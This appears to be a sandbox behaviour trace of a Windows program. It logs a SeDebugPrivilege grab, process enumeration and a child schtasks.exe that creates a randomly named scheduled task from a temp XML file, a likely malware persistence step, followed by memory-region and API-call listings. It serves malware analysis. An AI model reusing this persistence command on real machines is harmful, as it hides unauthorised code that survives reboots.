[0196.291] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0
[0196.321] LookupPrivilegeValueW (in: lpSystemName=0x0, lpName="SeDebugPrivilege", lpLuid=0x957eff4 | out: lpLuid=0x957eff4*(LowPart=0x14, HighPart=0)) returned 1
[0196.323] GetLastError () returned 0x0
[0196.323] GetCurrentProcess () returned 0xffffffff
[0196.325] GetLastError () returned 0x0
[0196.328] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x20, TokenHandle=0x957eff0 | out: TokenHandle=0x957eff0*=0x4e4) returned 1
[0196.328] GetLastError () returned 0x0
[0196.330] AdjustTokenPrivileges (in: TokenHandle=0x4e4, DisableAllPrivileges=0, NewState=0x279eff4*(PrivilegesCount=0x1, Privileges=((Luid.LowPart=0x14, Luid.HighPart=0, Attributes=0x2))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1
[0196.331] GetLastError () returned 0x0
[0196.410] CloseHandle (hObject=0x4e4) returned 1
[0196.410] GetLastError () returned 0x0
[0196.415] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3caad20, Length=0x20000, ResultLength=0x957f7a0 | out: SystemInformation=0x3caad20, ResultLength=0x957f7a0*=0x17850) returned 0x0
[0197.251] CoGetContextToken (in: pToken=0x957f2f0 | out: pToken=0x957f2f0) returned 0x0
[0197.252] IUnknown:QueryInterface (in: This=0x6fbbf8, riid=0x6c074a28*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x957f324 | out: ppvObject=0x957f324*=0x6fbc04) returned 0x0
[0197.252] IComThreadingInfo:GetCurrentThreadType (in: This=0x6fbc04, pThreadType=0x957f358 | out: pThreadType=0x957f358*=0) returned 0x0
[0197.252] IUnknown:Release (This=0x6fbc04) returned 0x0
Thread:
id = 108
os_tid = 0x288
Process:
id = "2"
image_name = "schtasks.exe"
filename = "c:\\windows\\syswow64\\schtasks.exe"
page_root = "0x51e3e000"
os_pid = "0x12c8"
os_integrity_level = "0x3000"
os_privileges = "0x60800000"
monitor_reason = "child_process"
parent_id = "1"
os_parent_pid = "0xaf0"
cmd_line = "\"C:\\Windows\\System32\\schtasks.exe\" /Create /TN \"Updates\\xErAccEJcQLD\" /XML \"C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp\\tmp2010.tmp\""
cur_dir = "C:\\Users\\RDhJ0CNFevzX\\Desktop\\"
os_username = "XC64ZB\\RDhJ0CNFevzX"
bitness = "32"
os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000fd44" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]
Region:
id = 940
start_va = 0x10000
end_va = 0x2ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000010000"
filename = ""
Region:
id = 941
start_va = 0x30000
end_va = 0x31fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000030000"
filename = ""
Region:
id = 942
start_va = 0x40000
end_va = 0x54fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000040000"
filename = ""
Region:
id = 943
start_va = 0x60000
end_va = 0x9ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000060000"
filename = ""
Region:
id = 944
start_va = 0xa0000
end_va = 0xdffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000000a0000"
filename = ""
Region:
id = 945
start_va = 0xe0000
end_va = 0xe3fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000000e0000"
filename = ""
Region:
id = 946
start_va = 0xf0000
end_va = 0xf0fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000000f0000"
filename = ""
Region:
id = 947
start_va = 0x100000
end_va = 0x101fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000100000"
filename = ""
Region:
id = 948
start_va = 0x3a0000
end_va = 0x3d1fff
monitored = 1
entry_point = 0x3c05b0
region_type = mapped_file
name = "schtasks.exe"
filename = "\\Windows\\SysWOW64\\schtasks.exe" (normalized: "c:\\windows\\syswow64\\schtasks.exe")
Region:
id = 949
start_va = 0x3e0000
end_va = 0x43dffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000003e0000"
filename = ""
Region:
id = 950
start_va = 0x4400000
end_va = 0x45fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004400000"
filename = ""
Region:
id = 951
start_va = 0x77260000
end_va = 0x773dafff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "ntdll.dll"
filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll")
Region:
id = 952
start_va = 0x7ffb0000
end_va = 0x7ffd2fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x000000007ffb0000"
filename = ""
Region:
id = 953
start_va = 0x7ffe0000
end_va = 0x7ffeffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000007ffe0000"
filename = ""
Region:
id = 954
start_va = 0x7fff0000
end_va = 0x7dfc5f80ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000007fff0000"
filename = ""
Region:
id = 955
start_va = 0x7dfc5f810000
end_va = 0x7ffc5f80ffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00007dfc5f810000"
filename = ""
Region:
id = 956
start_va = 0x7ffc5f810000
end_va = 0x7ffc5f9d0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "ntdll.dll"
filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")
Region:
id = 957
start_va = 0x7ffc5f9d1000
end_va = 0x7ffffffeffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00007ffc5f9d1000"
filename = ""
Region:
id = 958
start_va = 0x2b0000
end_va = 0x2bffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000002b0000"
filename = ""
Region:
id = 959
start_va = 0x62ee0000
end_va = 0x62f2ffff
monitored = 0
entry_point = 0x62ef8180
region_type = mapped_file
name = "wow64.dll"
filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll")
Region:
id = 960
start_va = 0x62f30000
end_va = 0x62fa9fff
monitored = 0
entry_point = 0x62f43290
region_type = mapped_file
name = "wow64win.dll"
filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll")
Region:
id = 961
start_va = 0x74530000
end_va = 0x7460ffff
monitored = 0
entry_point = 0x74543980
region_type = mapped_file
name = "kernel32.dll"
filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll")
Region:
id = 962
start_va = 0x62fb0000
end_va = 0x62fb7fff
monitored = 0
entry_point = 0x62fb17c0
region_type = mapped_file
name = "wow64cpu.dll"
filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll")
Region:
id = 963
start_va = 0x4600000
end_va = 0x486ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004600000"
filename = ""
Region:
id = 964
start_va = 0x74530000
end_va = 0x7460ffff
monitored = 0
entry_point = 0x74543980
region_type = mapped_file
name = "kernel32.dll"
filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll")
Region:
id = 965
start_va = 0x76c20000
end_va = 0x76d9dfff
monitored = 0
entry_point = 0x76cd1b90
region_type = mapped_file
name = "kernelbase.dll"
filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll")
Region:
id = 966
start_va = 0x10000
end_va = 0x1ffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000010000"
filename = ""
Region:
id = 967
start_va = 0x7feb0000
end_va = 0x7ffaffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x000000007feb0000"
filename = ""
Region:
id = 1050
start_va = 0x110000
end_va = 0x1cdfff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "locale.nls"
filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls")
Region:
id = 1051
start_va = 0x20000
end_va = 0x23fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000020000"
filename = ""
Region:
id = 1052
start_va = 0x74290000
end_va = 0x7434dfff
monitored = 0
entry_point = 0x742c5630
region_type = mapped_file
name = "msvcrt.dll"
filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll")
Region:
id = 1053
start_va = 0x1d0000
end_va = 0x20ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000001d0000"
filename = ""
Region:
id = 1054
start_va = 0x210000
end_va = 0x24ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000210000"
filename = ""
Region:
id = 1055
start_va = 0x743f0000
end_va = 0x74481fff
monitored = 0
entry_point = 0x74428cf0
region_type = mapped_file
name = "oleaut32.dll"
filename = "\\Windows\\SysWOW64\\oleaut32.dll" (normalized: "c:\\windows\\syswow64\\oleaut32.dll")
Region:
id = 1056
start_va = 0x76da0000
end_va = 0x76f5cfff
monitored = 0
entry_point = 0x76e82a10
region_type = mapped_file
name = "combase.dll"
filename = "\\Windows\\SysWOW64\\combase.dll" (normalized: "c:\\windows\\syswow64\\combase.dll")
Region:
id = 1057
start_va = 0x75f60000
end_va = 0x7600cfff
monitored = 0
entry_point = 0x75f74f00
region_type = mapped_file
name = "rpcrt4.dll"
filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll")
Region:
id = 1058
start_va = 0x73f90000
end_va = 0x73fadfff
monitored = 0
entry_point = 0x73f9b640
region_type = mapped_file
name = "sspicli.dll"
filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll")
Region:
id = 1059
start_va = 0x73f80000
end_va = 0x73f89fff
monitored = 0
entry_point = 0x73f82a00
region_type = mapped_file
name = "cryptbase.dll"
filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll")
Region:
id = 1060
start_va = 0x75ef0000
end_va = 0x75f47fff
monitored = 0
entry_point = 0x75f325c0
region_type = mapped_file
name = "bcryptprimitives.dll"
filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll")
Region:
id = 1061
start_va = 0x74a40000
end_va = 0x74a83fff
monitored = 0
entry_point = 0x74a59d80
region_type = mapped_file
name = "sechost.dll"
filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll")
Region:
id = 1062
start_va = 0x4870000
end_va = 0x4a3ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004870000"
filename = ""
Region:
id = 1063
start_va = 0x4600000
end_va = 0x46e9fff
monitored = 0
entry_point = 0x463d650
region_type = mapped_file
name = "ole32.dll"
filename = "\\Windows\\SysWOW64\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll")
Region:
id = 1064
start_va = 0x4770000
end_va = 0x486ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004770000"
filename = ""
Region:
id = 1065
start_va = 0x30000
end_va = 0x31fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000030000"
filename = ""
Region:
id = 1066
start_va = 0x250000
end_va = 0x250fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000250000"
filename = ""
Region:
id = 1067
start_va = 0x4a40000
end_va = 0x4e3afff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000004a40000"
filename = ""
Region:
id = 1068
start_va = 0x4e40000
end_va = 0x5176fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "sortdefault.nls"
filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls")
Region:
id = 1069
start_va = 0x74350000
end_va = 0x7435bfff
monitored = 0
entry_point = 0x74353930
region_type = mapped_file
name = "kernel.appcore.dll"
filename = "\\Windows\\SysWOW64\\kernel.appcore.dll" (normalized: "c:\\windows\\syswow64\\kernel.appcore.dll")
Region:
id = 1070
start_va = 0x260000
end_va = 0x260fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000260000"
filename = ""
Region:
id = 1071
start_va = 0x74360000
end_va = 0x743e3fff
monitored = 0
entry_point = 0x74386220
region_type = mapped_file
name = "clbcatq.dll"
filename = "\\Windows\\SysWOW64\\clbcatq.dll" (normalized: "c:\\windows\\syswow64\\clbcatq.dll")
Region:
id = 1072
start_va = 0x270000
end_va = 0x270fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000270000"
filename = ""
Region:
id = 1073
start_va = 0x6a520000
end_va = 0x6a5abfff
monitored = 0
entry_point = 0x6a55a6c0
region_type = mapped_file
name = "taskschd.dll"
filename = "\\Windows\\SysWOW64\\taskschd.dll" (normalized: "c:\\windows\\syswow64\\taskschd.dll")
Thread:
id = 13
os_tid = 0x1c4
[0193.527] GetModuleHandleA (lpModuleName=0x0) returned 0x3a0000
[0193.527] __set_app_type (_Type=0x1)
[0193.527] __p__fmode () returned 0x74344d6c
[0193.527] __p__commode () returned 0x74345b1c
[0193.528] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x3c0840) returned 0x0
[0193.528] __wgetmainargs (in: _Argc=0x3cade0, _Argv=0x3cade4, _Env=0x3cade8, _DoWildCard=0, _StartInfo=0x3cadf4 | out: _Argc=0x3cade0, _Argv=0x3cade4, _Env=0x3cade8) returned 0
[0193.528] _onexit (_Func=0x3c2bc0) returned 0x3c2bc0
[0193.529] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1
[0193.529] WinSqmIsOptedIn () returned 0x0
[0193.529] GetProcessHeap () returned 0x4770000
[0193.529] RtlAllocateHeap (HeapHandle=0x4770000, Flags=0xc, Size=0x10) returned 0x4777498
[0193.529] RtlRestoreLastWin32Error () returned 0x0
[0193.529] VerSetConditionMask (ConditionMask=0x0, TypeMask=0x0, Condition=0x2) returned 0x18
[0193.529] VerSetConditionMask (ConditionMask=0x18, TypeMask=0x80000000, Condition=0x1) returned 0x1b
[0193.529] VerSetConditionMask (ConditionMask=0x1b, TypeMask=0x80000000, Condition=0x20) returned 0x1801b
[0193.530] RtlVerifyVersionInfo (VersionInfo=0xdf9f8, TypeMask=0x3, ConditionMask=0x1801b) returned 0x0
[0193.530] GetProcessHeap () returned 0x4770000
[0193.530] RtlAllocateHeap (HeapHandle=0x4770000, Flags=0xc, Size=0x10) returned 0x4777378
[0193.530] lstrlenW (lpString="") returned 0
[0193.530] GetProcessHeap () returned 0x4770000
[0193.530] RtlAllocateHeap (HeapHandle=0x4770000, Flags=0xc, Size=0x2) returned 0x4770598
[0193.530] GetProcessHeap () returned 0x4770000
[0193.530] RtlAllocateHeap (HeapHandle=0x4770000, Flags=0xc, Size=0x14) returned 0x4776e48
[0193.530] GetProcessHeap () returned 0x4770000
[0193.530] RtlAllocateHeap (HeapHandle=0x4770000, Flags=0xc, Size=0x10) returned 0x47774e0
[0193.530] GetProcessHeap () returned 0x4770000
[0193.530] RtlAllocateHeap (HeapHandle=0x4770000, Flags=0xc, Size=0x14) returned 0x4776c10
[0193.530] GetProcessHeap () returned 0x4770000
[0193.530] RtlAllocateHeap (HeapHandle=0x4770000, Flags=0xc, Size=0x14) returned 0x4776c30
[0193.530] GetProcessHeap () returned 0x4770000
[0193.530] RtlAllocateHeap (HeapHandle=0x4770000, Flags=0xc, Size=0x14) returned 0x4776c50
[0193.530] GetProcessHeap () returned 0x4770000
[0193.530] RtlAllocateHeap (HeapHandle=0x4770000, Flags=0xc, Size=0x14) returned 0x4776840
[0193.530] GetProcessHeap () returned 0x4770000
[0193.530] RtlAllocateHeap (HeapHandle=0x4770000, Flags=0xc, Size=0x10) returned 0x47773d8
[0193.530] GetProcessHeap () returned 0x4770000
[0193.530] RtlAllocateHeap (HeapHandle=0x4770000, Flags=0xc, Size=0x14) returned 0x4776860
[0193.530] GetProcessHeap () returned 0x4770000
[0193.531] RtlAllocateHeap (HeapHandle=0x4770000, Flags=0xc, Size=0x14) returned 0x4776880
[0193.531] GetProcessHeap () returned 0x4770000
[0193.531] RtlAllocateHeap (HeapHandle=0x4770000, Flags=0xc, Size=0x14) returned 0x47765d8
[0193.531] GetProcessHeap () returned 0x4770000
[0193.531] RtlAllocateHeap (HeapHandle=0x4770000, Flags=0xc, Size=0x14) returned 0x47765f8
[0193.531] GetProcessHeap () returned 0x4770000
[0193.531] RtlAllocateHeap (HeapHandle=0x4770000, Flags=0xc, Size=0x10) returned 0x4777390
[0193.531] GetProcessHeap () returned 0x4770000
[0193.531] RtlAllocateHeap (HeapHandle=0x4770000, Flags=0xc, Size=0x14) returned 0x4776618
[0193.531] GetProcessHeap () returned 0x4770000
[0193.531] RtlAllocateHeap (HeapHandle=0x4770000, Flags=0xc, Size=0x14) returned 0x4772780
[0193.531] GetProcessHeap () returned 0x4770000
[0193.531] RtlAllocateHeap (HeapHandle=0x4770000, Flags=0xc, Size=0x14) returned 0x47727a0
[0193.531] GetProcessHeap () returned 0x4770000
[0193.531] RtlAllocateHeap (HeapHandle=0x4770000, Flags=0xc, Size=0x14) returned 0x47727c0
[0193.531] SetThreadUILanguage (LangId=0x0) returned 0x409
[0193.538] RtlRestoreLastWin32Error () returned 0x0
[0193.538] GetProcessHeap () returned 0x4770000
[0193.538] RtlAllocateHeap (HeapHandle=0x4770000, Flags=0xc, Size=0x14) returned 0x47793c8
[0193.538] GetProcessHeap () returned 0x4770000
[0193.538] RtlAllocateHeap (HeapHandle=0x4770000, Flags=0xc, Size=0x14) returned 0x4779468
[0193.538] GetProcessHeap () returned 0x4770000
[0193.538] RtlAllocateHeap (HeapHandle=0x4770000, Flags=0xc, Size=0x14) returned 0x4779428
[0193.538] GetProcessHeap () returned 0x4770000
[0193.538] RtlAllocateHeap (HeapHandle=0x4770000, Flags=0xc, Size=0x14) returned 0x47794e8
[0193.538] GetProcessHeap () returned 0x4770000
[0193.538] RtlAllocateHeap (HeapHandle=0x4770000, Flags=0xc, Size=0x14) returned 0x4779588
[0193.538] GetProcessHeap () returned 0x4770000
[0193.538] RtlAllocateHeap (HeapHandle=0x4770000, Flags=0xc, Size=0x10) returned 0x4777438
[0193.538] _memicmp (_Buf1=0x4777438, _Buf2=0x3a2708, _Size=0x7) returned 0
[0193.539] GetProcessHeap () returned 0x4770000
[0193.539] RtlAllocateHeap (HeapHandle=0x4770000, Flags=0xc, Size=0x208) returned 0x4778ce0
[0193.539] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x4778ce0, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\schtasks.exe" (normalized: "c:\\windows\\syswow64\\schtasks.exe")) returned 0x20
[0193.539] GetFileVersionInfoSizeExW (in: dwFlags=0x1, lpwstrFilename="C:\\Windows\\SysWOW64\\schtasks.exe", lpdwHandle=0xdfb04 | out: lpdwHandle=0xdfb04) returned 0x76c
[0193.541] GetProcessHeap () returned 0x4770000
[0193.541] RtlAllocateHeap (HeapHandle=0x4770000, Flags=0xc, Size=0x776) returned 0x4779db8
[0193.541] GetFileVersionInfoExW (in: dwFlags=0x3, lpwstrFilename="C:\\Windows\\SysWOW64\\schtasks.exe", dwHandle=0x0, dwLen=0x776, lpData=0x4779db8 | out: lpData=0x4779db8) returned 1
[0193.542] VerQueryValueW (in: pBlock=0x4779db8, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0xdfb0c, puLen=0xdfb10 | out: lplpBuffer=0xdfb0c*=0x477a168, puLen=0xdfb10) returned 1
[0193.544] _memicmp (_Buf1=0x4777438, _Buf2=0x3a2708, _Size=0x7) returned 0
[0193.544] _vsnwprintf (in: _Buffer=0x4778ce0, _BufferCount=0x3f, _Format="\\StringFileInfo\\%04x%04x\\InternalName", _ArgList=0xdfaf0 | out: _Buffer="\\StringFileInfo\\040904b0\\InternalName") returned 37
[0193.545] VerQueryValueW (in: pBlock=0x4779db8, lpSubBlock="\\StringFileInfo\\040904b0\\InternalName", lplpBuffer=0xdfb1c, puLen=0xdfb18 | out: lplpBuffer=0xdfb1c*=0x4779f98, puLen=0xdfb18) returned 1
[0193.545] lstrlenW (lpString="schtasks.exe") returned 12
[0193.545] lstrlenW (lpString="schtasks.exe") returned 12
[0193.545] lstrlenW (lpString=".EXE") returned 4
[0193.545] StrStrIW (lpFirst="schtasks.exe", lpSrch=".EXE") returned=".exe"
[0193.546] lstrlenW (lpString="schtasks.exe") returned 12
[0193.546] lstrlenW (lpString=".EXE") returned 4
[0193.546] _memicmp (_Buf1=0x4777438, _Buf2=0x3a2708, _Size=0x7) returned 0
[0193.546] lstrlenW (lpString="schtasks") returned 8
[0193.546] GetProcessHeap () returned 0x4770000
[0193.546] RtlAllocateHeap (HeapHandle=0x4770000, Flags=0xc, Size=0x14) returned 0x4779608
[0193.546] GetProcessHeap () returned 0x4770000
[0193.546] RtlAllocateHeap (HeapHandle=0x4770000, Flags=0xc, Size=0x14) returned 0x4779688
[0193.546] GetProcessHeap () returned 0x4770000
[0193.546] RtlAllocateHeap (HeapHandle=0x4770000, Flags=0xc, Size=0x14) returned 0x47793e8
[0193.546] GetProcessHeap () returned 0x4770000
[0193.547] RtlAllocateHeap (HeapHandle=0x4770000, Flags=0xc, Size=0x14) returned 0x47793a8
[0193.547] GetProcessHeap () returned 0x4770000
[0193.547] RtlAllocateHeap (HeapHandle=0x4770000, Flags=0xc, Size=0x10) returned 0x4777480
[0193.547] _memicmp (_Buf1=0x4777480, _Buf2=0x3a2708, _Size=0x7) returned 0
[0193.547] GetProcessHeap () returned 0x4770000
[0193.547] RtlAllocateHeap (HeapHandle=0x4770000, Flags=0xc, Size=0xa0) returned 0x47769e0
[0193.547] GetProcessHeap () returned 0x4770000
[0193.547] RtlAllocateHeap (HeapHandle=0x4770000, Flags=0xc, Size=0x14) returned 0x4779548
[0193.547] GetProcessHeap () returned 0x4770000
[0193.547] RtlAllocateHeap (HeapHandle=0x4770000, Flags=0xc, Size=0x14) returned 0x4779528
[0193.547] GetProcessHeap () returned 0x4770000
[0193.547] RtlAllocateHeap (HeapHandle=0x4770000, Flags=0xc, Size=0x14) returned 0x47795a8
[0193.547] GetProcessHeap () returned 0x4770000
[0193.547] RtlAllocateHeap (HeapHandle=0x4770000, Flags=0xc, Size=0x10) returned 0x4777468
[0193.547] _memicmp (_Buf1=0x4777468, _Buf2=0x3a2708, _Size=0x7) returned 0
[0193.547] GetProcessHeap () returned 0x4770000
[0193.547] RtlAllocateHeap (HeapHandle=0x4770000, Flags=0xc, Size=0x200) returned 0x477a798
[0193.547] LoadStringW (in: hInstance=0x0, uID=0x15ed, lpBuffer=0x477a798, cchBufferMax=256 | out: lpBuffer="Type \"%s /?\" for usage.") returned 0x17
[0193.548] lstrlenW (lpString="Type \"%s /?\" for usage.") returned 23
[0193.548] GetProcessHeap () returned 0x4770000
[0193.548] RtlAllocateHeap (HeapHandle=0x4770000, Flags=0xc, Size=0x30) returned 0x4776a88
[0193.548] _vsnwprintf (in: _Buffer=0x47769e0, _BufferCount=0x4f, _Format="Type \"%s /?\" for usage.", _ArgList=0xdfaf4 | out: _Buffer="Type \"SCHTASKS /?\" for usage.") returned 29
[0193.548] GetProcessHeap () returned 0x4770000
[0193.548] GetProcessHeap () returned 0x4770000
[0193.548] HeapValidate (hHeap=0x4770000, dwFlags=0x0, lpMem=0x4779db8) returned 1
[0193.548] GetProcessHeap () returned 0x4770000
[0193.548] RtlSizeHeap (HeapHandle=0x4770000, Flags=0x0, MemoryPointer=0x4779db8) returned 0x776
[0193.548] RtlFreeHeap (HeapHandle=0x4770000, Flags=0x0, BaseAddress=0x4779db8) returned 1
[0193.548] RtlRestoreLastWin32Error () returned 0x0
[0193.548] GetThreadLocale () returned 0x409
[0193.548] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2
[0193.548] lstrlenW (lpString="?") returned 1
[0193.548] GetThreadLocale () returned 0x409
[0193.548] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2
[0193.548] lstrlenW (lpString="create") returned 6
[0193.548] GetThreadLocale () returned 0x409
[0193.548] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2
[0193.548] lstrlenW (lpString="delete") returned 6
[0193.548] GetThreadLocale () returned 0x409
[0193.548] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2
[0193.549] lstrlenW (lpString="query") returned 5
[0193.549] GetThreadLocale () returned 0x409
[0193.549] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2
[0193.549] lstrlenW (lpString="change") returned 6
[0193.549] GetThreadLocale () returned 0x409
[0193.549] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2
[0193.549] lstrlenW (lpString="run") returned 3
[0193.549] GetThreadLocale () returned 0x409
[0193.549] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2
[0193.549] lstrlenW (lpString="end") returned 3
[0193.549] GetThreadLocale () returned 0x409
[0193.549] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2
[0193.549] lstrlenW (lpString="showsid") returned 7
[0193.549] GetThreadLocale () returned 0x409
[0193.549] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2
[0193.549] RtlRestoreLastWin32Error () returned 0x0
[0193.549] RtlRestoreLastWin32Error () returned 0x0
[0193.549] lstrlenW (lpString="/Create") returned 7
[0193.549] lstrlenW (lpString="-/") returned 2
[0193.549] StrChrIW (lpStart="-/", wMatch=0x4a3002f) returned="/"
[0193.549] lstrlenW (lpString="?") returned 1
[0193.549] lstrlenW (lpString="?") returned 1
[0193.549] GetProcessHeap () returned 0x4770000
[0193.549] RtlAllocateHeap (HeapHandle=0x4770000, Flags=0xc, Size=0x10) returned 0x4777348
[0193.549] _memicmp (_Buf1=0x4777348, _Buf2=0x3a2708, _Size=0x7) returned 0
[0193.549] GetProcessHeap () returned 0x4770000
[0193.549] RtlAllocateHeap (HeapHandle=0x4770000, Flags=0xc, Size=0xa) returned 0x47774b0
[0193.549] lstrlenW (lpString="Create") returned 6
[0193.549] GetProcessHeap () returned 0x4770000
[0193.549] RtlAllocateHeap (HeapHandle=0x4770000, Flags=0xc, Size=0x10) returned 0x47773a8
[0193.549] _memicmp (_Buf1=0x47773a8, _Buf2=0x3a2708, _Size=0x7) returned 0
[0193.549] GetProcessHeap () returned 0x4770000
[0193.550] RtlAllocateHeap (HeapHandle=0x4770000, Flags=0xc, Size=0x14) returned 0x47795e8
[0193.550] _vsnwprintf (in: _Buffer=0x47774b0, _BufferCount=0x4, _Format="|%s|", _ArgList=0xdfae0 | out: _Buffer="|?|") returned 3
[0193.550] _vsnwprintf (in: _Buffer=0x47795e8, _BufferCount=0x9, _Format="|%s|", _ArgList=0xdfae0 | out: _Buffer="|Create|") returned 8
[0193.550] lstrlenW (lpString="|?|") returned 3
[0193.550] lstrlenW (lpString="|Create|") returned 8
[0193.550] RtlRestoreLastWin32Error () returned 0x490
[0193.550] lstrlenW (lpString="create") returned 6
[0193.550] lstrlenW (lpString="create") returned 6
[0193.550] _memicmp (_Buf1=0x4777348, _Buf2=0x3a2708, _Size=0x7) returned 0
[0193.550] GetProcessHeap () returned 0x4770000
[0193.550] HeapValidate (hHeap=0x4770000, dwFlags=0x0, lpMem=0x47774b0) returned 1
[0193.550] GetProcessHeap () returned 0x4770000
[0193.550] RtlReAllocateHeap (Heap=0x4770000, Flags=0xc, Ptr=0x47774b0, Size=0x14) returned 0x4779368
[0193.550] lstrlenW (lpString="Create") returned 6
[0193.550] _memicmp (_Buf1=0x47773a8, _Buf2=0x3a2708, _Size=0x7) returned 0
[0193.550] _vsnwprintf (in: _Buffer=0x4779368, _BufferCount=0x9, _Format="|%s|", _ArgList=0xdfae0 | out: _Buffer="|create|") returned 8
